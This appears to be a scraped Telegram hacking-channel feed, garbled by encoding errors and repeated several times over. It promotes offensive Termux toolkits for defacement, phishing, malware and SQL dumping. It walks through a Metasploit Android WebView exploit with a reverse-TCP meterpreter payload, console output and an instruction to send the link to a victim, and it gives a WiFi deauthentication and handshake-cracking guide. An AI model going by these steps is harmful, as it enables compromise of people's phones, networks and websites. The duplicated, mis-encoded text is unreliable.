ΒΆΒΆ D3m0ni4kTools.sh
Install #Metasploit
Install #ngrok
#Payload Generator
Auto Dump #sqlmap
#Dork
Auto #Deface
Scan #Vuln #Sql
#Scan #Subdomain #website
πgit clone https://github.com/D3m0ni4k/D3m0ni4kTools.sh.git
πcd D3m0ni4kTools.sh
πchmod +x D3m0ni4kTools.sh
πbash D3m0ni4kTools.sh
Install #Metasploit
Install #ngrok
#Payload Generator
Auto Dump #sqlmap
#Dork
Auto #Deface
Scan #Vuln #Sql
#Scan #Subdomain #website
πgit clone https://github.com/D3m0ni4k/D3m0ni4kTools.sh.git
πcd D3m0ni4kTools.sh
πchmod +x D3m0ni4kTools.sh
πbash D3m0ni4kTools.sh
ΒΆΒΆ H-Tool / 211-Tools
#TermuxToolx #phishing #bruteforce #vuln #scan #info #malware #wifi
πpkg update && pkg upgrade
πpkg install python
πpkg install git
πgit clone https://github.com/Anon-Divyanth/H-Tool
πcd H-Tool
πpip install -r requirments.txt
πpython Htool.py
[1] Phishing/ --14 Tools
[2] Brute Forcing/ --23 Tools
[3] Vulnerability Scanning/--40 Tools
[4] Information Gathering/--27 Tools
[5] Wifi Hacking / --08 Tools
[6] Tracing and Tracking/ -- 25 Tools
[7] Exploitation Tools/ --17 Tools
[8] Password Attacking/ --08 Tools
[9] Malware/ Tools --07 Tools
[10] Bombing/ Tools --11 Tools
[11] Another Hacking/ --31 Tools
[00] Exit
[*] Select Option :
#TermuxToolx #phishing #bruteforce #vuln #scan #info #malware #wifi
πpkg update && pkg upgrade
πpkg install python
πpkg install git
πgit clone https://github.com/Anon-Divyanth/H-Tool
πcd H-Tool
πpip install -r requirments.txt
πpython Htool.py
[1] Phishing/ --14 Tools
[2] Brute Forcing/ --23 Tools
[3] Vulnerability Scanning/--40 Tools
[4] Information Gathering/--27 Tools
[5] Wifi Hacking / --08 Tools
[6] Tracing and Tracking/ -- 25 Tools
[7] Exploitation Tools/ --17 Tools
[8] Password Attacking/ --08 Tools
[9] Malware/ Tools --07 Tools
[10] Bombing/ Tools --11 Tools
[11] Another Hacking/ --31 Tools
[00] Exit
[*] Select Option :
ΒΆΒΆ metasploit
#browser #payload #msf #vuln
Open nethunter
πmsfconsole
πsearch android
πuse exploit/android/browser/webview_addjavascriptinterface
πset SRVHOST 172.168.101.2
πset SRVPORT 8080
πset LHOST 172.168.101.2
πset LPORT 4444
πshow options
ΒΆΒΆ ------------------------------------
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.168.101.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
ΒΆΒΆ ---------------------------------------
πshow advanced
πset VERBOSE true
πset ReverseListenerBindPort 4444
πset ReverseListenerBindAddress 172.168.101.2
πexploit
------------------------
Started reverse TCP handler on 192.168.100.3:4444
[*] Using URL: http://172.168.101.2:8080/GrpllF13OO9k0k
[*] Server started.
msf5 exploit(android/browser/webview_addjavascriptinterface) >
Now send the link to vict
πhelp
#browser #payload #msf #vuln
Open nethunter
πmsfconsole
πsearch android
πuse exploit/android/browser/webview_addjavascriptinterface
πset SRVHOST 172.168.101.2
πset SRVPORT 8080
πset LHOST 172.168.101.2
πset LPORT 4444
πshow options
ΒΆΒΆ ------------------------------------
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.168.101.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
ΒΆΒΆ ---------------------------------------
πshow advanced
πset VERBOSE true
πset ReverseListenerBindPort 4444
πset ReverseListenerBindAddress 172.168.101.2
πexploit
------------------------
Started reverse TCP handler on 192.168.100.3:4444
[*] Using URL: http://172.168.101.2:8080/GrpllF13OO9k0k
[*] Server started.
msf5 exploit(android/browser/webview_addjavascriptinterface) >
Now send the link to vict
πhelp
ΒΆΒΆ PwnXSS
#web #scan #vuln
A powerful XSS scanner made in python 3.7
πpip install bs4
πpip install requests
πgit clone https://github.com/pwn0sec/PwnXSS πchmod 755 -R PwnXSS
πcd PwnXSS
πpython3 pwnxss.py --help
πpython3 pwnxss.py -u http://testphp.vulnweb.com
#web #scan #vuln
A powerful XSS scanner made in python 3.7
πpip install bs4
πpip install requests
πgit clone https://github.com/pwn0sec/PwnXSS πchmod 755 -R PwnXSS
πcd PwnXSS
πpython3 pwnxss.py --help
πpython3 pwnxss.py -u http://testphp.vulnweb.com
ΒΆΒΆ This guide is intended to serve as a basic introduction for using ZAP to perform security testing, Zed Attack Proxy (ZAP) is a free, open-source penetration testing tool
#pentest #vuln #web #kalitools
https://www.zaproxy.org/getting-started/
https://www.zaproxy.org/download/
https://software.opensuse.org/download.html?project=home%3Acabelo&package=owasp-zap
#pentest #vuln #web #kalitools
https://www.zaproxy.org/getting-started/
https://www.zaproxy.org/download/
https://software.opensuse.org/download.html?project=home%3Acabelo&package=owasp-zap
Media is too big
VIEW IN TELEGRAM
#stryker #termux #wifi #deauth #handshakecapture #wordlist #router #scan #vuln #wps #androidwarrior #rooted #kernel #drivers #nethunter #wifite
Application link = Stryker = https://strykerdefence.com/
you can use free version to scan for wps enabled networks ..deauth & capture handshake file
Application link = Stryker = https://strykerdefence.com/
you can use free version to scan for wps enabled networks ..deauth & capture handshake file
β€3π3
#stryker #termux #wifi #deauth #handshakecapture #wordlist #router #scan #vuln #wps #androidwarrior #rooted #kernel #drivers #nethunter #wifite
Application link = Stryker = https://strykerdefence.com/
you can use free version to scan for wps enabled networks ..deauth & capture handshake file
ΒΆΒΆ open Stryker after that plug in your wifi adapter ..We used MT7601U adapter ..but awus1900 & 1200 also works and do check if wlan0 works to scan for network before set to wlan1
ΒΆΒΆ Open Es file Explorer go to Stryker folder / in wordlist -- simply add ( past ) all the wordlist file u want ..
ΒΆΒΆ Device = Samsung Note9 /SMN960F -V9
https://t.me/termuxtoolx/2268
ΒΆΒΆ To check for adapter details u can use simpleUSB.apk link & video below
https://t.me/termuxtoolx/2236 (apk)
https://t.me/termuxtoolx/2235 (video )
ΒΆΒΆ To check for nearby routers details Use Wigle wifi https://play.google.com/store/apps/details?id=net.wigle.wigleandroid
ΒΆΒΆ IP Tool (wifi Analyzer) https://play.google.com/store/apps/details?id=com.ddm.iptools
ΒΆΒΆ Rockyou wordlist starting from 8 to 15 mix words
https://t.me/termuxtoolx/2064?single
ΒΆΒΆ Stryker Official Telegram Channel
https://t.me/strykerapp
https://t.me/strykereng
Application link = Stryker = https://strykerdefence.com/
you can use free version to scan for wps enabled networks ..deauth & capture handshake file
ΒΆΒΆ open Stryker after that plug in your wifi adapter ..We used MT7601U adapter ..but awus1900 & 1200 also works and do check if wlan0 works to scan for network before set to wlan1
ΒΆΒΆ Open Es file Explorer go to Stryker folder / in wordlist -- simply add ( past ) all the wordlist file u want ..
ΒΆΒΆ Device = Samsung Note9 /SMN960F -V9
https://t.me/termuxtoolx/2268
ΒΆΒΆ To check for adapter details u can use simpleUSB.apk link & video below
https://t.me/termuxtoolx/2236 (apk)
https://t.me/termuxtoolx/2235 (video )
ΒΆΒΆ To check for nearby routers details Use Wigle wifi https://play.google.com/store/apps/details?id=net.wigle.wigleandroid
ΒΆΒΆ IP Tool (wifi Analyzer) https://play.google.com/store/apps/details?id=com.ddm.iptools
ΒΆΒΆ Rockyou wordlist starting from 8 to 15 mix words
https://t.me/termuxtoolx/2064?single
ΒΆΒΆ Stryker Official Telegram Channel
https://t.me/strykerapp
https://t.me/strykereng
β€3π3